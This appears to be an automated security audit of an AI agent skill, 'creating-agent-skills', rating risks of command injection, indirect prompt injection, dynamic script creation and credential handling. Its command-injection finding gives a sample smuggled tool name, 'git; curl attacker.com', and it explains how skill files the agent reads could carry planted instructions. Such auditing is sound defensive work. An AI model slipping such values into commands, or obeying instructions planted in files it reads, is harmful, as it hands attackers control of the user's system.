The Agent Skills Directory

COMMAND_EXECUTION (HIGH): The skill executes arbitrary CLI commands based on text extracted from other files.
Evidence: In workflows/verify-skill.md, the agent is instructed to extract tool names from skill files and run which {tool-name} and {tool-name} --version. A maliciously crafted skill file could include shell metacharacters in a tool name (e.g., git; curl attacker.com) to achieve command injection during the verification process.
PROMPT_INJECTION (HIGH): Vulnerable to Indirect Prompt Injection (Category 8) due to the processing of untrusted data with high-privilege capabilities.
Ingestion points: workflows/audit-skill.md, workflows/verify-skill.md, and workflows/upgrade-to-router.md read file content from the ~/.claude/skills/ directory.
Boundary markers: No explicit boundary markers or instruction-ignoring delimiters are used when reading or processing the content of audited skills.
Capability inventory: The skill can write files (mkdir -p, cat >), modify file permissions (chmod +x), and execute shell commands (bash, which, python).
Sanitization: No sanitization is performed on the 'verifiable claims' or 'tool names' extracted from external skills before they are used in shell commands or documentation generation.
REMOTE_CODE_EXECUTION (MEDIUM): The skill dynamically generates and executes scripts.
Evidence: workflows/add-script.md creates shell, Python, or Node scripts and makes them executable using chmod +x. While intended for developer utility, this mechanism allows for the creation of persistence or malicious logic.
CREDENTIALS_UNSAFE (SAFE): The skill explicitly addresses credential safety in references/api-security.md, recommending a secure wrapper script and environment variable storage in ~/.claude/.env to prevent keys from appearing in chat logs.

creating-agent-skills